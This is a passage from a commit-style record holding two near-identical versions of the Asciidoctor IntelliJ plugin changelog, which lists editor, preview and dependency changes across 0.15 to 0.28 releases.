contents in Preview via JavaScript (#241)\n\n=== 0.28.20\n\n- Linking to Wiki page if JavaFX initialization is stuck (#299)\n\n=== 0.28.19\n\n- prevent \"`Initializing...`\" message in preview of empty file\n\n=== 0.28.18 (preview, available from Github releases)\n\n- detecting a stuck JavaFX initialization (#299)\n\n=== 0.28.17 (preview, available from Github releases)\n\n- tuning state resetting for lexer (#289)\n\n=== 0.28.16 (preview, available from Github releases)\n\n- adding code style settings for reformat (#289)\n- rework inline macro for false positives (#275)\n- ifdef\/ifndef\/endif body references attributes in (#275)\n- reset formatting after a blank line (#289)\n- navigate to auto-generated IDs of sections\n\n=== 0.28.15 (preview, available from Github releases)\n\n- respect imagesdir when resolving image paths in source file (#275)\n- resolve attribute names in macro definition (#275)\n- auto-completion of files should include \"..\" (#253)\n\n=== 0.28.14 (preview, available from Github releases)\n\n- lexer and highlighting support blocks with unbalanced or no delimiters (#289)\n\n=== 0.28.13 (preview, available from Github releases)\n\n- lexer and highlighting support several new tokens (callouts, admonitions, markdown style listings, definition lists) (#289)\n- reformat supports break-after-end-of-sentence, but still experimental (#289)\n\n=== 0.28.12 (preview, available from Github releases)\n\n- rework zoom for touchpads (#295)\n- added setting to disable error\/warning highlighting in editor (#296)\n\n=== 0.28.11 (preview, available from Github releases)\n\n- inject absolute location of .asciidoctorconfig file (thanks to @rdmueller) (#280)\n- support for '.adoc' extension of .asciidoctorconfig file (thanks to @rdmueller) (#293, #294)\n- new table size selector using the mouse (thanks to @bbrenne) (#92, #290)\n- create tables from clipboard and converting CSV\/TSV format to AsciiDoc (thanks to @bbrenne) (#92, #290)\n- better zoom support for touchpads, adding min\/max zoom level (#295)\n\n=== 0.28.10 (preview, available from Github releases)\n\n- inlining and extracting of includes (#271)\n\n=== 0.28.9 (preview, available from Github releases)\n\n- experimental support reformatting of AsciiDoc sources, needs to be enabled in the settings (#289)\n- \"`Open in Browser`\" now opens the contents of the preview in the selected browser including rendered diagrams (#82)\n\n=== 0.28.8 (preview, available from Github releases)\n\n- investigating problem that parts of the UI are not refreshing (#288)\n\n=== 0.28.7\n\n- Save image context menu now showing up on macOS (thanks to @wimdeblauwe) (#283)\n\n=== 0.28.6\n\n- fixing NPE introduced when detecting potentially blurry preview (#284)\n\n=== 0.28.5 (preview, available from Github releases)\n\n- support zoom in preview window (thanks to @ianflett) (#199, #279)\n- save generated images from preview (thanks to @bbrenne) (#245, #278)\n\n=== 0.28.4 (preview, available from Github releases)\n\n- autocompletion for attributes and attribute references (`:attr:` and `\\{attr}`) (thanks to @bbrenne) (#277)\n- renaming and find-usage for attribute names (#243)\n- upgrade to AsciidoctorJ 2.1.0 and Asciidoctor 2.0.10\n- statement completion adds newline if at end of file (#276)\n- listing and other delimiters recognized at end of file (#276)\n\n=== 0.28.3\n\n- brace matching for attribute start\/end (`:attr:` and `\\{attr}`)\n- syntax highlighting for enumerations (`.`)\n- fixing \"`Edit Fragment...`\" for listings (#276)\n\n=== 0.28.2\n\n- fixed parsing for old-style headers (#274)\n\n=== 0.28.1 (preview, available from Github releases)\n\n- new automated release mechanism, also EAP plugin repository\n\n=== 0.26.20 (preview, available from Github releases)\n\n- link to Wiki how to fix blurry preview (#213)\n- monospace-bold preview now working (#193)\n\n=== 0.26.19 (preview, available from Github releases)\n\n- tuning parsing and documentation (#267)\n- new inspection to shorten page break (`<<<`) where possible\n- `\\link:file#id[]` now with navigation and autocomplete (thanks to @bbrenne) (#273)\n\n=== 0.26.18 (preview, available from Github releases)\n\n- resolve the last reference in structure view as this will be the file; the others are the subdirectories (#267)\n- refactoring or shortened descriptions; now in sync for structure view and breadcrumbs (#267)\n- allow browser to cache static content to avoid flickering (#267)\n- allow more block types, supporting nested blocks, parsing content within blocks (#267)\n- rework folding to show first significant line in block (#267)\n\n=== 0.26.17 (preview, available from Github releases)\n\n- support escaping with backslash (`\\`) in editor, avoiding highlighting\n- move to released markdown-to-asciidoc version 1.1 to use proper dependency management (#268)\n- support spell checking on more elements including quotes, examples and comments (#269)\n- fixing autocomplete for file names on `include::[]` within blocks\n\n=== 0.26.16 (preview, available from Github releases)\n\n- show includes and images in structure view, adding icon set for breadcrumbs and structure view, tuning contents (#267)\n\n=== 0.26.15\n\n- fixing equals check for disabled injected languages (#266)\n\n=== 0.26.14\n\n- fixing NullPointerException in settings processing (#266)\n- supporting pass-through inline content\n\n=== 0.26.13\n\n- update to asciidoctorj-diagram:1.5.18\n- breadcrumb support in editor\n\n=== 0.26.12 (preview, available from Github releases)\n\n- supporting blanks in block attributes (#255)\n\n=== 0.26.11 (preview, available from Github releases)\n\n- adding support for GRAPHVIZ_DOT environment variable (#261)\n- adding support for statement completion (ctrl-shift-enter) (#263)\n- language injection can now is now enabled by default and can be disabled for specific languages, and will be disabled when the block has an `include::[]` (#255)\n- includes are now parsed and highlighted inside code blocks (#255)\n\n=== 0.26.10 (preview, available from Github releases)\n\n- Experimental highlighting in code blocks (#255, #262)\n\n=== 0.26.9 (preview, available from Github releases)\n\n- upgrading gradle and JetBrains plugin; now use `gradlew runIde` to start the plugin in development mode\n- allow user to switch left\/right and upper\/lower in split view (#136)\n- add syntax highlighter to support `\\link:file[]` (thanks to @bbrenne) (#259)\n- add syntax highlighter to support attribute:value and {attribute reference} (thanks to @bbrenne) (#260)\n\n=== 0.26.8 (preview, available from Github releases)\n\n- default file encoding for JRuby now UTF-8 if set file encoding is not supported by JRuby (#174)\n\n=== 0.26.7\n\n- fixing error in tree structure; improving test capabilities for parsing (#174)\n\n=== 0.26.6 (preview, available from Github releases)\n\n- improved brace matcher\n- ensure that block IDs are part of next section when folding (#174)\n\n=== 0.26.5 (preview, available from Github releases)\n\n- decouple read action from event thread to avoid error from IDE (#204)\n- highlighting for lexical quotes\n- parsing referenced file from reference (#204)\n\n=== 0.26.4 (preview, available from Github releases)\n\n- Support for relative path links in preview (#256)\n\n=== 0.26.3 (preview, available from Github releases)\n\n- allow folding of sections and blocks (#174)\n\n=== 0.26.2 (preview, available from Github releases)\n\n- allow horizontal split view via settings (#136)\n\n=== 0.26.1 (preview, available from Github releases)\n\n- adding color settings for syntax highlighting (#254)\n\n=== 0.26.0 (preview, available from Github releases)\n\n- support for anchors, block ids and references including linking and refactoring (#252)\n\n=== 0.25.14\n\n- making linking of documents work for standard includes (#204)\n- improved formatting when blank lines are edited, also handling spaces at the end of a line (#248)\n\n=== 0.25.13\n\n- support partitial parsing in lexer to avoid flipping formatting in IntelliJ (#248)\n\n=== 0.25.12 (preview, available from Github releases)\n\n- adding additional rules for constrained formatting (#248)\n\n=== 0.25.11\n\n- moving from jruby-complete to jruby dependency like AsciidoctorJ did for 2.0 (#250)\n\n=== 0.25.10 (preview, available from Github releases)\n\n- improved syntax highlighting for block IDs and references, suppressing message \"possible invalid reference\" (#249)\n- show error message why preview wasn't rendered in preview (#251)\n\n=== 0.25.9\n\n- adding quote handler (#242)\n- Tuning highlighting for mono and bullet lists (#244)\n- Activating brace highlighting for mono\/italic\/bold (#244)\n\n=== 0.25.8 (preview, available from Github releases)\n\n- Tuning highlighting italic\/bold\/mono, adding brace matcher in text (#244)\n\n=== 0.25.7 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v2.0.0 that includes Asciidoctor 2.0.8\n- adding highlighting for italic\/bold\/mono (#244)\n- adding brace matcher for attributes\n\n=== 0.25.6 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v2.0.0-RC.2 that includes Asciidoctor 2.0.6\n- Improved parsing of warnings and errors created by Asciidoctor\n\n=== 0.25.5 (preview, available from Github releases)\n\n- Addding error highlight in tree view\n\n=== 0.25.4 (preview, available from Github releases)\n\n- restart annotation processing for current file once it gets focused or settings change (#225)\n\n=== 0.25.3 (preview, available from Github releases)\n\n- improve offset calculation for .asciidoctorconfig files (#225)\n\n=== 0.25.2 (preview, available from Github releases)\n\n- annotate the file in the editor instead of logging to console for asciidoctor messages (#225)\n\n=== 0.25.1 (preview, available from Github releases)\n\n- Fixing preview line calculation when using .asciidoctorconfig-files\n- Updating to AsciidoctorJ v2.0.0-RC.1 that includes Asciidoctor 2.0.2\n\n=== 0.25.0 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v1.7.0-RC.1 that includes Asciidoctor 2.0.1 and Asciidoctor Diagram 1.5.16\n\n=== 0.24.4\n\n- Fixing preview line calculation when using .asciidoctorconfig-files\n\n=== 0.24.3\n\n- Filter out problematic pass-through JavaScript with Twitter being the first candidate (#235)\n\n=== 0.24.2 (preview, available from Github releases)\n\n- Support JDK11 as of IntelliJ 2019.1 EAP (#238)\n\n=== 0.24.1\n\n- Upgrade to AsciidoctorJ 1.6.2 and JRuby 9.2.6.0 (it's still backed by Asciidoctor 1.5.8)\n- Upgrade to asciidoctor diagram 1.5.12\n- Additional logging to analyze errors (#236)\n\n=== 0.24.0\n\n- Upgrade to AsciidoctorJ 1.6.1 and JRuby 9.2.5.0 (it's still backed by Asciidoctor 1.5.8)\n- Upgrade to asciidoctor diagram 1.5.11\n- Updated parser for old style multiline headings to be more specific (#233)\n- Added description for old style heading inspection (#233)\n\n=== 0.23.2\n\n- Resource cleanup for Asciidoctor Ruby Extensions (#220)\n\n=== 0.23.1 (preview, available from Github releases)\n\n- Updated file icon with less intrusive icon, also introducing SVG for icons (#230)\n- Editor notification to switch to JetBrains 64bit JDK (#189)\n- Tuning support for Asciidoctor Ruby Extensions (#220)\n\n=== 0.23.0 (preview, available from Github releases)\n\n- EXPERIMENTAL: Support Asciidoctor Ruby Extensions when placed in _.asciidoctor\/lib_ (#220)\n\n=== 0.22.0\n\n- Update to AsciidoctorJ 1.5.8.1\n- Workaround for incompatible plugins (#226)\n- Toggle softwraps only available in context menu of AsciiDoc documents (#227)\n- Recognize list continuations plus block instead of marking them as old style headings (#228)\n- EXPERIMENTAL: supporting _.asciidoctorconfig_ configuration files\n\n=== 0.21.4\n\n- Add official asciidoctor logo (#219)\n- Add soft wrap to tool bar (#221)\n- Editor Toolbar show status of toggles\n- Update to Asciidoctor Diagram 1.5.10 (#215)\n\n=== 0.21.3\n\n- upgrade to MathJAX 2.4.7 (as bundled in AsciidoctorJ 1.5.7)\n\n=== 0.21.2\n\n- Regression: show title of document again (#217)\n\n=== 0.21.1\n\n- allow attributes to be pre-defined in plugin settings (#216)\n\n=== 0.21.0 (preview, available from Github releases)\n\n- Update to AsciidoctorJ 1.5.7 and Asciidoctor Diagram 1.5.9\n- Treat \"line must be non negative\" only as a warning (#212)\n\n=== 0.20.6\n\n- Display all PlantUML graphics as PNG for preview (#170)\n\n=== 0.20.5\n\n- Adding hiDPI support for JavaFX preview (#125)\n\n=== 0.20.4\n\n- Requiring 2017.1 as minimum for this plugin (#207)\n\n=== 0.20.3 (preview, available from Github releases)\n\n- Avoiding deadlock on JavaFX initialization (#207)\n- Requiring 2017.2 as minimum for this plugin\n\n=== 0.20.2\n\n- Dejavu fonts now display chinese characters within tables (#203)\n\n=== 0.20.1\n\n- Upgrading to asciidoctorj-diagram 1.5.8\n- Dejavu fonts now display chinese characters (#203)\n\n=== 0.20.0\n\n- Add MathJax support in JavaFX preview #201\n- JavaFX preview is now the default for new installations of the plugin\n- Include DejaVu fonts for improved and consistent preview #184\n\n=== 0.19.2\n\n- Fix NullPointerExceptions when used with IntelliJ Language Injection and Fragment Editor #194\n\n=== 0.19.1\n\n- Support inspections to convert markdown and old style AsciiDoc headings to modern AsciiDoc headings #185\n- JRuby runtime updated to 9.1.8.0 to work with recent JDK versions (still, internal JetBrains JRE is the only supported version) #187\n\n=== 0.19.0\n\n- Support Icon fonts (thanks to @matthiasbalke) \/ #182\n- Update to asciidoctorj-1.5.6 (aka asciidoctor-1.5.6.1) and asciidoctorj-diagram-1.5.4.1\n- Support \"search everywhere\" (double Shift) and \"goto by name - Symbol...\" (Ctrl+Shift+Alt+N) for all AsciiDoc section headings - just enter a part of the heading\n- Support Markdown style sections (starting with '#') in syntax highlighting\n\n=== 0.18.2 (preview, available from Github releases)\n\n- Headings in Darcula theme preview are now light grey for better readability\n\n=== 0.18.1\n\n- Improved handling for non-printable characters in syntax highlighting\n\n=== 0.18.0 (preview, available from Github releases)\n\n- Update to asciidoctor 1.5.5\/asciidoctor-diagram 1.5.4\n- Capture Asciidoctor messages on stdout\/stderr and write them to IDE notifications\n- Close files when images are shown in preview\n- Set focus in editor when re-opening file\n- Fix \"line must be non negative\" error when clicking on preview\n\n=== 0.17.3\n\n- Make click-on-link-to-open and click-on-preview-to-set-cursor in JavaFX preview compatible with Java 8 u111+\n- Formatting actions from the toolbar should not throw exceptions when triggered at the beginning or end of the document\n\n=== 0.17.2\n\n- Plugin is now build using the https:\/\/gradle.org\/[Gradle] and https:\/\/github.com\/JetBrains\/gradle-intellij-plugin[gradle-intellij-plugin]\nThis should make contributing and releasing easier. Thanks Jiawen Geng!\n- Asciidoctor's temporary files are now created in a temporary folder per opened document. Thanks @agorges!\n\n=== 0.17.1 (preview, available from Github releases)\n\n- Improved handling of trailing spaces in syntax highlighting.\n- Fixed code\/preview sync for nested HTML (i.e. NOTE)\n\n=== 0.17.0 (preview, available from Github releases)\n\n- Updated block parsing to support two styles of headings.\n- Block starts and ends are need to be aligned in length and shape when parsed.\n\n=== 0.16.4\n\n- Improved darcula support for JavaFX. More block types are using proper dark background and light text colors.\n\n=== 0.16.3\n\n- Theme in preview can be switched from light to darcula independent of IDE theme\n\n=== 0.16.2\n\n- Handling of Linux and MacOS file names for image preview in JavaFX\n\n=== 0.16.1\n\n- Added darcula theme for JavaFX preview\n- Clicking on JavaFX preview will set cursor position in editor (thanks to @kastork for the idea)\n\n=== 0.15.4\n\n- setScene now called from FxThread instead of AWT thread to avoid blocking GUI on MacOS\n\n=== 0.15.3\n\n- Initialization message appears only during initialization\n- No error message if user switches to a setup where JavaFX preview is no longer available.\n\n=== 0.15.2 (preview, available from Github releases)\n\n- fixed detection of Mac 64 JVM to be able to activate JavaFX preview\n- click-on-url for JavaFX improved, when slow-loading external images are referenced\n\n=== 0.15.1 (preview, available from Github releases)\n\n- revised constrained\/unconstrained detection\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- refreshing images on JavaFX only if their content has changed to save memory consumption\n- Limiting JavaFX preview to 64bit platforms due to problems especially with Windows OpenJDK 32bit (as default on Windows).\n\n=== 0.15.0 (preview, available from Github releases)\n\n- correct usage of constrained\/unconstrained AsciiDoc formatting\n- JavaFX Preview will automatically scroll to the cursor position of the editor\n- JavaFX preview will automatically open links in the systems's default browser\n- Caching rendering instances of Asciidoctor for better performance\n\nIntelliJ 15 (including AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11) is the new minimum version required for this release.\n\n","old_contents":"= Asciidoctor IntelliJ Plugin Changelog\n\n== About\n\nThis document provides a high-level view of the changes introduced by release.\n\n[[releasenotes]]\n== Release notes\n\n=== 0.28.26 (work in progress)\n\n- improve handling of emails and links in editor (#307)\n\n=== 0.28.25\n\n- security review for in-browser preview, adding mac to prevent browser to retrieve arbitrary file, hiding referrer from externally retrieved resources (#303)\n\n=== 0.28.24 (preview, available from Github releases)\n\n- support undo for paste-image and send out notifications to add files to VCS (#298)\n- fix rendering of images in flicker-free fast preview (#241)\n- prevent NPE when opening AsciiDoc documents or fragments in browser (#303)\n- inspection to convert Markdown-style horizontal rules to AsciiDoc-style horizontal rules (thanks to @bbrenne) (#272, #302)\n\n=== 0.28.23 (preview, available from Github releases)\n\n- Paste image from clipboard (thanks to @bbrenne) (#298, #300)\n\n=== 0.28.22\n\n- Wrong test name in gutter when running tests, BrowserUrlProvider eagerly works on all files (#301)\n\n=== 0.28.21\n\n- fixing autocomplete for link: when brackets already provided\n- avoid flickering Math preview by replacing contents in Preview via JavaScript (#241)\n\n=== 0.28.20\n\n- Linking to Wiki page if JavaFX initialization is stuck (#299)\n\n=== 0.28.19\n\n- prevent \"`Initializing...`\" message in preview of empty file\n\n=== 0.28.18 (preview, available from Github releases)\n\n- detecting a stuck JavaFX initialization (#299)\n\n=== 0.28.17 (preview, available from Github releases)\n\n- tuning state resetting for lexer (#289)\n\n=== 0.28.16 (preview, available from Github releases)\n\n- adding code style settings for reformat (#289)\n- rework inline macro for false positives (#275)\n- ifdef\/ifndef\/endif body references attributes in (#275)\n- reset formatting after a blank line (#289)\n- navigate to auto-generated IDs of sections\n\n=== 0.28.15 (preview, available from Github releases)\n\n- respect imagesdir when resolving image paths in source file (#275)\n- resolve attribute names in macro definition (#275)\n- auto-completion of files should include \"..\" (#253)\n\n=== 0.28.14 (preview, available from Github releases)\n\n- lexer and highlighting support blocks with unbalanced or no delimiters (#289)\n\n=== 0.28.13 (preview, available from Github releases)\n\n- lexer and highlighting support several new tokens (callouts, admonitions, markdown style listings, definition lists) (#289)\n- reformat supports break-after-end-of-sentence, but still experimental (#289)\n\n=== 0.28.12 (preview, available from Github releases)\n\n- rework zoom for touchpads (#295)\n- added setting to disable error\/warning highlighting in editor (#296)\n\n=== 0.28.11 (preview, available from Github releases)\n\n- inject absolute location of .asciidoctorconfig file (thanks to @rdmueller) (#280)\n- support for '.adoc' extension of .asciidoctorconfig file (thanks to @rdmueller) (#293, #294)\n- new table size selector using the mouse (thanks to @bbrenne) (#92, #290)\n- create tables from clipboard and converting CSV\/TSV format to AsciiDoc (thanks to @bbrenne) (#92, #290)\n- better zoom support for touchpads, adding min\/max zoom level (#295)\n\n=== 0.28.10 (preview, available from Github releases)\n\n- inlining and extracting of includes (#271)\n\n=== 0.28.9 (preview, available from Github releases)\n\n- experimental support reformatting of AsciiDoc sources, needs to be enabled in the settings (#289)\n- \"`Open in Browser`\" now opens the contents of the preview in the selected browser including rendered diagrams (#82)\n\n=== 0.28.8 (preview, available from Github releases)\n\n- investigating problem that parts of the UI are not refreshing (#288)\n\n=== 0.28.7\n\n- Save image context menu now showing up on macOS (thanks to @wimdeblauwe) (#283)\n\n=== 0.28.6\n\n- fixing NPE introduced when detecting potentially blurry preview (#284)\n\n=== 0.28.5 (preview, available from Github releases)\n\n- support zoom in preview window (thanks to @ianflett) (#199, #279)\n- save generated images from preview (thanks to @bbrenne) (#245, #278)\n\n=== 0.28.4 (preview, available from Github releases)\n\n- autocompletion for attributes and attribute references (`:attr:` and `\\{attr}`) (thanks to @bbrenne) (#277)\n- renaming and find-usage for attribute names (#243)\n- upgrade to AsciidoctorJ 2.1.0 and Asciidoctor 2.0.10\n- statement completion adds newline if at end of file (#276)\n- listing and other delimiters recognized at end of file (#276)\n\n=== 0.28.3\n\n- brace matching for attribute start\/end (`:attr:` and `\\{attr}`)\n- syntax highlighting for enumerations (`.`)\n- fixing \"`Edit Fragment...`\" for listings (#276)\n\n=== 0.28.2\n\n- fixed parsing for old-style headers (#274)\n\n=== 0.28.1 (preview, available from Github releases)\n\n- new automated release mechanism, also EAP plugin repository\n\n=== 0.26.20 (preview, available from Github releases)\n\n- link to Wiki how to fix blurry preview (#213)\n- monospace-bold preview now working (#193)\n\n=== 0.26.19 (preview, available from Github releases)\n\n- tuning parsing and documentation (#267)\n- new inspection to shorten page break (`<<<`) where possible\n- `\\link:file#id[]` now with navigation and autocomplete (thanks to @bbrenne) (#273)\n\n=== 0.26.18 (preview, available from Github releases)\n\n- resolve the last reference in structure view as this will be the file; the others are the subdirectories (#267)\n- refactoring or shortened descriptions; now in sync for structure view and breadcrumbs (#267)\n- allow browser to cache static content to avoid flickering (#267)\n- allow more block types, supporting nested blocks, parsing content within blocks (#267)\n- rework folding to show first significant line in block (#267)\n\n=== 0.26.17 (preview, available from Github releases)\n\n- support escaping with backslash (`\\`) in editor, avoiding highlighting\n- move to released markdown-to-asciidoc version 1.1 to use proper dependency management (#268)\n- support spell checking on more elements including quotes, examples and comments (#269)\n- fixing autocomplete for file names on `include::[]` within blocks\n\n=== 0.26.16 (preview, available from Github releases)\n\n- show includes and images in structure view, adding icon set for breadcrumbs and structure view, tuning contents (#267)\n\n=== 0.26.15\n\n- fixing equals check for disabled injected languages (#266)\n\n=== 0.26.14\n\n- fixing NullPointerException in settings processing (#266)\n- supporting pass-through inline content\n\n=== 0.26.13\n\n- update to asciidoctorj-diagram:1.5.18\n- breadcrumb support in editor\n\n=== 0.26.12 (preview, available from Github releases)\n\n- supporting blanks in block attributes (#255)\n\n=== 0.26.11 (preview, available from Github releases)\n\n- adding support for GRAPHVIZ_DOT environment variable (#261)\n- adding support for statement completion (ctrl-shift-enter) (#263)\n- language injection can now is now enabled by default and can be disabled for specific languages, and will be disabled when the block has an `include::[]` (#255)\n- includes are now parsed and highlighted inside code blocks (#255)\n\n=== 0.26.10 (preview, available from Github releases)\n\n- Experimental highlighting in code blocks (#255, #262)\n\n=== 0.26.9 (preview, available from Github releases)\n\n- upgrading gradle and JetBrains plugin; now use `gradlew runIde` to start the plugin in development mode\n- allow user to switch left\/right and upper\/lower in split view (#136)\n- add syntax highlighter to support `\\link:file[]` (thanks to @bbrenne) (#259)\n- add syntax highlighter to support attribute:value and {attribute reference} (thanks to @bbrenne) (#260)\n\n=== 0.26.8 (preview, available from Github releases)\n\n- default file encoding for JRuby now UTF-8 if set file encoding is not supported by JRuby (#174)\n\n=== 0.26.7\n\n- fixing error in tree structure; improving test capabilities for parsing (#174)\n\n=== 0.26.6 (preview, available from Github releases)\n\n- improved brace matcher\n- ensure that block IDs are part of next section when folding (#174)\n\n=== 0.26.5 (preview, available from Github releases)\n\n- decouple read action from event thread to avoid error from IDE (#204)\n- highlighting for lexical quotes\n- parsing referenced file from reference (#204)\n\n=== 0.26.4 (preview, available from Github releases)\n\n- Support for relative path links in preview (#256)\n\n=== 0.26.3 (preview, available from Github releases)\n\n- allow folding of sections and blocks (#174)\n\n=== 0.26.2 (preview, available from Github releases)\n\n- allow horizontal split view via settings (#136)\n\n=== 0.26.1 (preview, available from Github releases)\n\n- adding color settings for syntax highlighting (#254)\n\n=== 0.26.0 (preview, available from Github releases)\n\n- support for anchors, block ids and references including linking and refactoring (#252)\n\n=== 0.25.14\n\n- making linking of documents work for standard includes (#204)\n- improved formatting when blank lines are edited, also handling spaces at the end of a line (#248)\n\n=== 0.25.13\n\n- support partitial parsing in lexer to avoid flipping formatting in IntelliJ (#248)\n\n=== 0.25.12 (preview, available from Github releases)\n\n- adding additional rules for constrained formatting (#248)\n\n=== 0.25.11\n\n- moving from jruby-complete to jruby dependency like AsciidoctorJ did for 2.0 (#250)\n\n=== 0.25.10 (preview, available from Github releases)\n\n- improved syntax highlighting for block IDs and references, suppressing message \"possible invalid reference\" (#249)\n- show error message why preview wasn't rendered in preview (#251)\n\n=== 0.25.9\n\n- adding quote handler (#242)\n- Tuning highlighting for mono and bullet lists (#244)\n- Activating brace highlighting for mono\/italic\/bold (#244)\n\n=== 0.25.8 (preview, available from Github releases)\n\n- Tuning highlighting italic\/bold\/mono, adding brace matcher in text (#244)\n\n=== 0.25.7 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v2.0.0 that includes Asciidoctor 2.0.8\n- adding highlighting for italic\/bold\/mono (#244)\n- adding brace matcher for attributes\n\n=== 0.25.6 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v2.0.0-RC.2 that includes Asciidoctor 2.0.6\n- Improved parsing of warnings and errors created by Asciidoctor\n\n=== 0.25.5 (preview, available from Github releases)\n\n- Addding error highlight in tree view\n\n=== 0.25.4 (preview, available from Github releases)\n\n- restart annotation processing for current file once it gets focused or settings change (#225)\n\n=== 0.25.3 (preview, available from Github releases)\n\n- improve offset calculation for .asciidoctorconfig files (#225)\n\n=== 0.25.2 (preview, available from Github releases)\n\n- annotate the file in the editor instead of logging to console for asciidoctor messages (#225)\n\n=== 0.25.1 (preview, available from Github releases)\n\n- Fixing preview line calculation when using .asciidoctorconfig-files\n- Updating to AsciidoctorJ v2.0.0-RC.1 that includes Asciidoctor 2.0.2\n\n=== 0.25.0 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v1.7.0-RC.1 that includes Asciidoctor 2.0.1 and Asciidoctor Diagram 1.5.16\n\n=== 0.24.4\n\n- Fixing preview line calculation when using .asciidoctorconfig-files\n\n=== 0.24.3\n\n- Filter out problematic pass-through JavaScript with Twitter being the first candidate (#235)\n\n=== 0.24.2 (preview, available from Github releases)\n\n- Support JDK11 as of IntelliJ 2019.1 EAP (#238)\n\n=== 0.24.1\n\n- Upgrade to AsciidoctorJ 1.6.2 and JRuby 9.2.6.0 (it's still backed by Asciidoctor 1.5.8)\n- Upgrade to asciidoctor diagram 1.5.12\n- Additional logging to analyze errors (#236)\n\n=== 0.24.0\n\n- Upgrade to AsciidoctorJ 1.6.1 and JRuby 9.2.5.0 (it's still backed by Asciidoctor 1.5.8)\n- Upgrade to asciidoctor diagram 1.5.11\n- Updated parser for old style multiline headings to be more specific (#233)\n- Added description for old style heading inspection (#233)\n\n=== 0.23.2\n\n- Resource cleanup for Asciidoctor Ruby Extensions (#220)\n\n=== 0.23.1 (preview, available from Github releases)\n\n- Updated file icon with less intrusive icon, also introducing SVG for icons (#230)\n- Editor notification to switch to JetBrains 64bit JDK (#189)\n- Tuning support for Asciidoctor Ruby Extensions (#220)\n\n=== 0.23.0 (preview, available from Github releases)\n\n- EXPERIMENTAL: Support Asciidoctor Ruby Extensions when placed in _.asciidoctor\/lib_ (#220)\n\n=== 0.22.0\n\n- Update to AsciidoctorJ 1.5.8.1\n- Workaround for incompatible plugins (#226)\n- Toggle softwraps only available in context menu of AsciiDoc documents (#227)\n- Recognize list continuations plus block instead of marking them as old style headings (#228)\n- EXPERIMENTAL: supporting _.asciidoctorconfig_ configuration files\n\n=== 0.21.4\n\n- Add official asciidoctor logo (#219)\n- Add soft wrap to tool bar (#221)\n- Editor Toolbar show status of toggles\n- Update to Asciidoctor Diagram 1.5.10 (#215)\n\n=== 0.21.3\n\n- upgrade to MathJAX 2.4.7 (as bundled in AsciidoctorJ 1.5.7)\n\n=== 0.21.2\n\n- Regression: show title of document again (#217)\n\n=== 0.21.1\n\n- allow attributes to be pre-defined in plugin settings (#216)\n\n=== 0.21.0 (preview, available from Github releases)\n\n- Update to AsciidoctorJ 1.5.7 and Asciidoctor Diagram 1.5.9\n- Treat \"line must be non negative\" only as a warning (#212)\n\n=== 0.20.6\n\n- Display all PlantUML graphics as PNG for preview (#170)\n\n=== 0.20.5\n\n- Adding hiDPI support for JavaFX preview (#125)\n\n=== 0.20.4\n\n- Requiring 2017.1 as minimum for this plugin (#207)\n\n=== 0.20.3 (preview, available from Github releases)\n\n- Avoiding deadlock on JavaFX initialization (#207)\n- Requiring 2017.2 as minimum for this plugin\n\n=== 0.20.2\n\n- Dejavu fonts now display chinese characters within tables (#203)\n\n=== 0.20.1\n\n- Upgrading to asciidoctorj-diagram 1.5.8\n- Dejavu fonts now display chinese characters (#203)\n\n=== 0.20.0\n\n- Add MathJax support in JavaFX preview #201\n- JavaFX preview is now the default for new installations of the plugin\n- Include DejaVu fonts for improved and consistent preview #184\n\n=== 0.19.2\n\n- Fix NullPointerExceptions when used with IntelliJ Language Injection and Fragment Editor #194\n\n=== 0.19.1\n\n- Support inspections to convert markdown and old style AsciiDoc headings to modern AsciiDoc headings #185\n- JRuby runtime updated to 9.1.8.0 to work with recent JDK versions (still, internal JetBrains JRE is the only supported version) #187\n\n=== 0.19.0\n\n- Support Icon fonts (thanks to @matthiasbalke) \/ #182\n- Update to asciidoctorj-1.5.6 (aka asciidoctor-1.5.6.1) and asciidoctorj-diagram-1.5.4.1\n- Support \"search everywhere\" (double Shift) and \"goto by name - Symbol...\" (Ctrl+Shift+Alt+N) for all AsciiDoc section headings - just enter a part of the heading\n- Support Markdown style sections (starting with '#') in syntax highlighting\n\n=== 0.18.2 (preview, available from Github releases)\n\n- Headings in Darcula theme preview are now light grey for better readability\n\n=== 0.18.1\n\n- Improved handling for non-printable characters in syntax highlighting\n\n=== 0.18.0 (preview, available from Github releases)\n\n- Update to asciidoctor 1.5.5\/asciidoctor-diagram 1.5.4\n- Capture Asciidoctor messages on stdout\/stderr and write them to IDE notifications\n- Close files when images are shown in preview\n- Set focus in editor when re-opening file\n- Fix \"line must be non negative\" error when clicking on preview\n\n=== 0.17.3\n\n- Make click-on-link-to-open and click-on-preview-to-set-cursor in JavaFX preview compatible with Java 8 u111+\n- Formatting actions from the toolbar should not throw exceptions when triggered at the beginning or end of the document\n\n=== 0.17.2\n\n- Plugin is now build using the https:\/\/gradle.org\/[Gradle] and https:\/\/github.com\/JetBrains\/gradle-intellij-plugin[gradle-intellij-plugin]\nThis should make contributing and releasing easier. Thanks Jiawen Geng!\n- Asciidoctor's temporary files are now created in a temporary folder per opened document. Thanks @agorges!\n\n=== 0.17.1 (preview, available from Github releases)\n\n- Improved handling of trailing spaces in syntax highlighting.\n- Fixed code\/preview sync for nested HTML (i.e. NOTE)\n\n=== 0.17.0 (preview, available from Github releases)\n\n- Updated block parsing to support two styles of headings.\n- Block starts and ends are need to be aligned in length and shape when parsed.\n\n=== 0.16.4\n\n- Improved darcula support for JavaFX. More block types are using proper dark background and light text colors.\n\n=== 0.16.3\n\n- Theme in preview can be switched from light to darcula independent of IDE theme\n\n=== 0.16.2\n\n- Handling of Linux and MacOS file names for image preview in JavaFX\n\n=== 0.16.1\n\n- Added darcula theme for JavaFX preview\n- Clicking on JavaFX preview will set cursor position in editor (thanks to @kastork for the idea)\n\n=== 0.15.4\n\n- setScene now called from FxThread instead of AWT thread to avoid blocking GUI on MacOS\n\n=== 0.15.3\n\n- Initialization message appears only during initialization\n- No error message if user switches to a setup where JavaFX preview is no longer available.\n\n=== 0.15.2 (preview, available from Github releases)\n\n- fixed detection of Mac 64 JVM to be able to activate JavaFX preview\n- click-on-url for JavaFX improved, when slow-loading external images are referenced\n\n=== 0.15.1 